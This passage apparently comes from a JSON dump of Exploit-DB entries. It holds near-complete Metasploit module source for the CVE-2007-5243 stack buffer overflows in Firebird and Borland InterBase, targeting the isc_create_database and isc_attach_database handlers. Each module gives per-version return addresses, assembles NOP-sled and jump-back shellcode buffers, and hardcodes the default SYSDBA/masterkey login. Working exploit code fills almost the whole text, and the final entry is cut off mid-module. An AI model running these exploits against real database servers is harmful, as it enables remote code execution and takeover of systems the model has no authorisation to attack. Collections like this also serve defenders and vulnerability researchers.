'Brute Force', { } ],\r\n\t\t\t\t\t# 0x0040230b pop ebp; pop ebx; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Firebird WI-V1.5.3.4870 WI-V1.5.4.4910',\r\n\t\t\t\t\t\t{ 'Length' => [ 308 ], 'Ret' => 0x0040230b }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# Debug\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Debug',\r\n\t\t\t\t\t\t{ 'Length' => [ 308 ], 'Ret' => 0xaabbccdd }\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 1,\r\n\t\t\t'DisclosureDate' => 'Oct 03 2007'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3050)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit_target(target)\r\n\r\n\t\ttarget['Length'].each do |length|\r\n\r\n\t\t\tconnect\r\n\r\n\t\t\t# Attach database\r\n\t\t\top_attach = 19\r\n\r\n\t\t\t# Create database\r\n\t\t\top_create = 20\r\n\r\n\t\t\t# Service attach\r\n\t\t\top_service_attach = 82\r\n\r\n\t\t\tremainder = length.remainder(4)\r\n\t\t\tpadding = 0\r\n\r\n\t\t\tif remainder > 0\r\n\t\t\t\tpadding = (4 - remainder)\r\n\t\t\tend\r\n\r\n\t\t\tbuf = ''\r\n\r\n\t\t\t# Operation/packet type\r\n\t\t\tbuf << [op_service_attach].pack('N')\r\n\r\n\t\t\t# Id\r\n\t\t\tbuf << [0].pack('N')\r\n\r\n\t\t\t# Length\r\n\t\t\tbuf << [length].pack('N')\r\n\r\n\t\t\t# Nop block\r\n\t\t\tbuf << make_nops(length - payload.encoded.length - 13)\r\n\r\n\t\t\t# Payload\r\n\t\t\tbuf << payload.encoded\r\n\r\n\t\t\t# Jump back into the nop block\r\n\t\t\tbuf << \"\\xe9\" + [-260].pack('V')\r\n\r\n\t\t\t# Jump back\r\n\t\t\tbuf << \"\\xeb\" + [-7].pack('c')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(2)\r\n\r\n\t\t\t# Target\r\n\t\t\tbuf << [target.ret].pack('V')\r\n\r\n\t\t\t# Padding\r\n\t\t\tbuf << \"\\x00\" * padding\r\n\r\n\t\t\t# Database parameter block\r\n\r\n\t\t\t# Length\r\n\t\t\tbuf << [1024].pack('N')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(1024)\r\n\r\n\t\t\tsock.put(buf)\r\n\r\n\t\t\t#select(nil,nil,nil,4)\r\n\r\n\t\t\thandler\r\n\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, 
"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16420/"}, {"lastseen": "2016-02-01T23:51:15", "description": "Firebird Relational Database isc_create_database() Buffer Overflow. CVE-2007-5243. Remote exploit for windows platform", "published": "2010-07-03T00:00:00", "type": "exploitdb", "title": "Firebird Relational Database isc_create_database Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2010-07-03T00:00:00", "id": "EDB-ID:16432", "href": "https://www.exploit-db.com/exploits/16432/", "sourceData": "##\r\n# $Id: fb_isc_create_database.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::BruteTargets\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Firebird Relational Database isc_create_database() Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\r\n\t\t\t\tby sending a specially crafted create request.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision: 9669 $',\r\n\t\t\t'Author'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ramon',\r\n\t\t\t\t\t'Adriano Lima <adriano@risesecurity.org>',\r\n\t\t\t\t],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'win',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5243' ],\r\n\t\t\t\t\t[ 'OSVDB', '38606' ],\r\n\t\t\t\t\t[ 'BID', '25917' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' 
],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Brute Force', { } ],\r\n\t\t\t\t\t# '\\Device\\HarddiskVolume1\\WINDOWS\\system32\\unicode.nls'\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)',\r\n\t\t\t\t\t\t{ 'Length' => [ 756 ], 'Ret' => 0x00370b0b }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# Debug\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Debug',\r\n\t\t\t\t\t\t{ 'Length' => [ 756 ], 'Ret' => 0xaabbccdd }\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 1,\r\n\t\t\t'DisclosureDate' => 'Oct 03 2007'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3050)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\t# Create database parameter block\r\n\tdef dpb_create\r\n\t\tisc_dpb_user_name = 28\r\n\t\tisc_dpb_password = 29\r\n\r\n\t\tisc_dpb_version1 = 1\r\n\r\n\t\tuser = 'SYSDBA'\r\n\t\tpass = 'masterkey'\r\n\r\n\t\tdpb = ''\r\n\r\n\t\tdpb << [isc_dpb_version1].pack('c')\r\n\r\n\t\tdpb << [isc_dpb_user_name].pack('c')\r\n\t\tdpb << [user.length].pack('c')\r\n\t\tdpb << user\r\n\r\n\t\tdpb << [isc_dpb_password].pack('c')\r\n\t\tdpb << [pass.length].pack('c')\r\n\t\tdpb << pass\r\n\r\n\t\tdpb\r\n\tend\r\n\r\n\t# Calculate buffer padding\r\n\tdef buf_padding(length = '')\r\n\t\tremainder = length.remainder(4)\r\n\t\tpadding = 0\r\n\r\n\t\tif remainder > 0\r\n\t\t\tpadding = (4 - remainder)\r\n\t\tend\r\n\r\n\t\tpadding\r\n\tend\r\n\r\n\tdef exploit_target(target)\r\n\r\n\t\ttarget['Length'].each do |length|\r\n\r\n\t\t\tconnect\r\n\r\n\t\t\t# Create database\r\n\t\t\top_create = 20\r\n\r\n\t\t\t# Extra padding to trigger the exception\r\n\t\t\textra_padding = 1024 * 16\r\n\r\n\t\t\tbuf = ''\r\n\r\n\t\t\t# Operation/packet type\r\n\t\t\tbuf << 
[op_create].pack('N')\r\n\r\n\t\t\t# Id\r\n\t\t\tbuf << [0].pack('N')\r\n\r\n\t\t\t# Length\r\n\t\t\tbuf << [length + extra_padding].pack('N')\r\n\r\n\t\t\t# Nop block\r\n\t\t\tbuf << make_nops(length - payload.encoded.length - 13)\r\n\r\n\t\t\t# Payload\r\n\t\t\tbuf << payload.encoded\r\n\r\n\t\t\t# Jump back into the nop block\r\n\t\t\tbuf << \"\\xe9\" + [-516].pack('V')\r\n\r\n\t\t\t# Jump back\r\n\t\t\tbuf << \"\\xeb\" + [-7].pack('c')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(2)\r\n\r\n\t\t\t# Target\r\n\t\t\tbuf << [target.ret].pack('V')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(extra_padding)\r\n\r\n\t\t\t# Padding\r\n\t\t\tbuf << \"\\x00\" * buf_padding(length + extra_padding)\r\n\r\n\t\t\t# Database parameter block\r\n\r\n\t\t\t# Create database parameter block\r\n\t\t\tdpb = dpb_create\r\n\r\n\t\t\t# Database parameter block length\r\n\t\t\tbuf << [dpb.length].pack('N')\r\n\r\n\t\t\t# Database parameter block\r\n\t\t\tbuf << dpb\r\n\r\n\t\t\t# Padding\r\n\t\t\tbuf << \"\\x00\" * buf_padding(dpb.length)\r\n\r\n\t\t\tsock.put(buf)\r\n\r\n\t\t\tselect(nil,nil,nil,4)\r\n\r\n\t\t\thandler\r\n\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16432/"}, {"lastseen": "2016-02-01T23:51:57", "description": "Borland InterBase isc_create_database() Buffer Overflow. CVE-2007-5243. 
Remote exploit for windows platform", "published": "2010-07-03T00:00:00", "type": "exploitdb", "title": "Borland InterBase isc_create_database Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2010-07-03T00:00:00", "id": "EDB-ID:16437", "href": "https://www.exploit-db.com/exploits/16437/", "sourceData": "##\r\n# $Id: ib_isc_create_database.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::BruteTargets\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Borland InterBase isc_create_database() Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\r\n\t\t\t\tby sending a specially crafted create request.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision: 9669 $',\r\n\t\t\t'Author'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ramon',\r\n\t\t\t\t\t'Adriano Lima <adriano@risesecurity.org>',\r\n\t\t\t\t],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'win',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5243' ],\r\n\t\t\t\t\t[ 'OSVDB', '38606' ],\r\n\t\t\t\t\t[ 'BID', '25917' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 
'Brute Force', { } ],\r\n\t\t\t\t\t# 0x00403d4b pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V8.1.0.257',\r\n\t\t\t\t\t\t{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403d4b }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00403d4d pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V8.0.0.123',\r\n\t\t\t\t\t\t{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403d4d }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00403a5d pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80',\r\n\t\t\t\t\t\t{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403a5d }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x004038fd pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V7.0.1.1',\r\n\t\t\t\t\t\t{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x004038fd }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x0040390d pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V6.5.0.28',\r\n\t\t\t\t\t\t{ 'Length' => [ 1332, 1336 ], 'Ret' => 0x0040390d }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00403901 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V6.0.1.6',\r\n\t\t\t\t\t\t{ 'Length' => [ 1332, 1336 ], 'Ret' => 0x00403901 }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x004038b1 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0',\r\n\t\t\t\t\t\t{ 'Length' => [ 1332, 1336 ], 'Ret' => 0x004038b1 }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00404a10 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V5.5.0.742',\r\n\t\t\t\t\t\t{ 'Length' => [ 1432, 1436 ], 'Ret' => 0x00404a10 }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00404a0e pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V5.1.1.680',\r\n\t\t\t\t\t\t{ 'Length' => [ 1336, 1340 ], 'Ret' => 0x00404a0e }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# Debug\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Debug',\r\n\t\t\t\t\t\t{ 'Length' => [ 1336 ], 'Ret' => 0xaabbccdd 
}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 0,\r\n\t\t\t'DisclosureDate' => 'Oct 03 2007'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3050)\r\n\t\t\t],\r\n\t\t\tself.class\r\n\t\t)\r\n\r\n\tend\r\n\r\n\tdef exploit_target(target)\r\n\r\n\t\ttarget['Length'].each do |length|\r\n\r\n\t\t\tconnect\r\n\r\n\t\t\t# Create database\r\n\t\t\top_create = 20\r\n\r\n\t\t\tremainder = length.remainder(4)\r\n\t\t\tpadding = 0\r\n\r\n\t\t\tif remainder > 0\r\n\t\t\t\tpadding = (4 - remainder)\r\n\t\t\tend\r\n\r\n\t\t\tbuf = ''\r\n\r\n\t\t\t# Operation/packet type\r\n\t\t\tbuf << [op_create].pack('N')\r\n\r\n\t\t\t# Id\r\n\t\t\tbuf << [0].pack('N')\r\n\r\n\t\t\t# Length\r\n\t\t\tbuf << [length].pack('N')\r\n\r\n\t\t\t# Nop block\r\n\t\t\tbuf << make_nops(length - payload.encoded.length - 13)\r\n\r\n\t\t\t# Payload\r\n\t\t\tbuf << payload.encoded\r\n\r\n\t\t\t# Jump back into the nop block\r\n\t\t\tbuf << \"\\xe9\" + [-1028].pack('V')\r\n\r\n\t\t\t# Jump back\r\n\t\t\tbuf << \"\\xeb\" + [-7].pack('c')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(2)\r\n\r\n\t\t\t# Target\r\n\t\t\tbuf << [target.ret].pack('V')\r\n\r\n\t\t\t# Padding\r\n\t\t\tbuf << \"\\x00\" * padding\r\n\r\n\t\t\t# Database parameter block\r\n\r\n\t\t\t# Length\r\n\t\t\tbuf << [1024].pack('N')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(1024)\r\n\r\n\t\t\tsock.put(buf)\r\n\r\n\t\t\tselect(nil,nil,nil,4)\r\n\r\n\t\t\thandler\r\n\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16437/"}, {"lastseen": "2016-02-01T23:52:23", "description": "Firebird Relational Database isc_attach_database() Buffer Overflow. CVE-2007-5243. 
Remote exploit for windows platform", "published": "2010-07-03T00:00:00", "type": "exploitdb", "title": "Firebird Relational Database isc_attach_database Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2010-07-03T00:00:00", "id": "EDB-ID:16440", "href": "https://www.exploit-db.com/exploits/16440/", "sourceData": "##\r\n# $Id: fb_isc_attach_database.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::BruteTargets\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Firebird Relational Database isc_attach_database() Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\r\n\t\t\t\tby sending a specially crafted create request.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision: 9669 $',\r\n\t\t\t'Author'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ramon',\r\n\t\t\t\t\t'Adriano Lima <adriano@risesecurity.org>',\r\n\t\t\t\t],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'win',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5243' ],\r\n\t\t\t\t\t[ 'OSVDB', '38607' ],\r\n\t\t\t\t\t[ 'BID', '25917' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\r\n\t\t\t\t\t'StackAdjustment' => 
-3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Brute Force', { } ],\r\n\t\t\t\t\t# '\\Device\\HarddiskVolume1\\WINDOWS\\system32\\unicode.nls'\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)',\r\n\t\t\t\t\t\t{ 'Length' => [ 756 ], 'Ret' => 0x00370b0b }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# Debug\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Debug',\r\n\t\t\t\t\t\t{ 'Length' => [ 756 ], 'Ret' => 0xaabbccdd }\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 1,\r\n\t\t\t'DisclosureDate' => 'Oct 03 2007'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3050)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\t# Create database parameter block\r\n\tdef dpb_create\r\n\t\tisc_dpb_user_name = 28\r\n\t\tisc_dpb_password = 29\r\n\r\n\t\tisc_dpb_version1 = 1\r\n\r\n\t\tuser = 'SYSDBA'\r\n\t\tpass = 'masterkey'\r\n\r\n\t\tdpb = ''\r\n\r\n\t\tdpb << [isc_dpb_version1].pack('c')\r\n\r\n\t\tdpb << [isc_dpb_user_name].pack('c')\r\n\t\tdpb << [user.length].pack('c')\r\n\t\tdpb << user\r\n\r\n\t\tdpb << [isc_dpb_password].pack('c')\r\n\t\tdpb << [pass.length].pack('c')\r\n\t\tdpb << pass\r\n\r\n\t\tdpb\r\n\tend\r\n\r\n\t# Calculate buffer padding\r\n\tdef buf_padding(length = '')\r\n\t\tremainder = length.remainder(4)\r\n\t\tpadding = 0\r\n\r\n\t\tif remainder > 0\r\n\t\t\tpadding = (4 - remainder)\r\n\t\tend\r\n\r\n\t\tpadding\r\n\tend\r\n\r\n\tdef exploit_target(target)\r\n\r\n\t\ttarget['Length'].each do |length|\r\n\r\n\t\t\tconnect\r\n\r\n\t\t\t# Attach database\r\n\t\t\top_attach = 19\r\n\r\n\t\t\t# Extra padding to trigger the exception\r\n\t\t\textra_padding = 1024 * 16\r\n\r\n\t\t\tbuf = ''\r\n\r\n\t\t\t# Operation/packet type\r\n\t\t\tbuf << [op_attach].pack('N')\r\n\r\n\t\t\t# Id\r\n\t\t\tbuf << [0].pack('N')\r\n\r\n\t\t\t# Length\r\n\t\t\tbuf << [length + extra_padding].pack('N')\r\n\r\n\t\t\t# Nop block\r\n\t\t\tbuf << make_nops(length - payload.encoded.length - 13)\r\n\r\n\t\t\t# Payload\r\n\t\t\tbuf << 
payload.encoded\r\n\r\n\t\t\t# Jump back into the nop block\r\n\t\t\tbuf << \"\\xe9\" + [-516].pack('V')\r\n\r\n\t\t\t# Jump back\r\n\t\t\tbuf << \"\\xeb\" + [-7].pack('c')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(2)\r\n\r\n\t\t\t# Target\r\n\t\t\tbuf << [target.ret].pack('V')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(extra_padding)\r\n\r\n\t\t\t# Padding\r\n\t\t\tbuf << \"\\x00\" * buf_padding(length + extra_padding)\r\n\r\n\t\t\t# Database parameter block\r\n\r\n\t\t\t# Create database parameter block\r\n\t\t\tdpb = dpb_create\r\n\r\n\t\t\t# Database parameter block length\r\n\t\t\tbuf << [dpb.length].pack('N')\r\n\r\n\t\t\t# Database parameter block\r\n\t\t\tbuf << dpb\r\n\r\n\t\t\t# Padding\r\n\t\t\tbuf << \"\\x00\" * buf_padding(dpb.length)\r\n\r\n\t\t\tsock.put(buf)\r\n\r\n\t\t\tselect(nil,nil,nil,4)\r\n\r\n\t\t\thandler\r\n\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16440/"}, {"lastseen": "2016-02-01T23:53:23", "description": "Borland InterBase isc_attach_database() Buffer Overflow. CVE-2007-5243. Remote exploit for windows platform", "published": "2010-07-03T00:00:00", "type": "exploitdb", "title": "Borland InterBase isc_attach_database Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2010-07-03T00:00:00", "id": "EDB-ID:16447", "href": "https://www.exploit-db.com/exploits/16447/", "sourceData": "##\r\n# $Id: ib_isc_attach_database.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::BruteTargets\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Borland InterBase isc_attach_database() Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\r\n\t\t\t\tby sending a specially crafted attach request.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision: 9669 $',\r\n\t\t\t'Author'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ramon',\r\n\t\t\t\t\t'Adriano Lima <adriano@risesecurity.org>',\r\n\t\t\t\t],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'win',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5243' ],\r\n\t\t\t\t\t[ 'OSVDB', '38607' ],\r\n\t\t\t\t\t[ 'BID', '25917' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Brute Force', { } ],\r\n\t\t\t\t\t# 0x00403d4b pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V8.1.0.257',\r\n\t\t\t\t\t\t{ 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403d4b }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00403d4d pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V8.0.0.123',\r\n\t\t\t\t\t\t{ 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403d4d }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00403a5d pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80',\r\n\t\t\t\t\t\t{ 
'Length' => [ 3136, 3140 ], 'Ret' => 0x00403a5d }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x004038fd pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V7.0.1.1',\r\n\t\t\t\t\t\t{ 'Length' => [ 3136, 3140 ], 'Ret' => 0x004038fd }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x0040390d pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V6.5.0.28',\r\n\t\t\t\t\t\t{ 'Length' => [ 1328, 1332 ], 'Ret' => 0x0040390d }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00403901 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V6.0.1.6',\r\n\t\t\t\t\t\t{ 'Length' => [ 1328, 1332 ], 'Ret' => 0x00403901 }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x004038b1 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0',\r\n\t\t\t\t\t\t{ 'Length' => [ 1328, 1332 ], 'Ret' => 0x004038b1 }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00404a10 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V5.5.0.742',\r\n\t\t\t\t\t\t{ 'Length' => [ 1428, 1432 ], 'Ret' => 0x00404a10 }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00404a0e pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V5.1.1.680',\r\n\t\t\t\t\t\t{ 'Length' => [ 1332, 1336 ], 'Ret' => 0x00404a0e }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# Debug\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Debug',\r\n\t\t\t\t\t\t{ 'Length' => [ 1332 ], 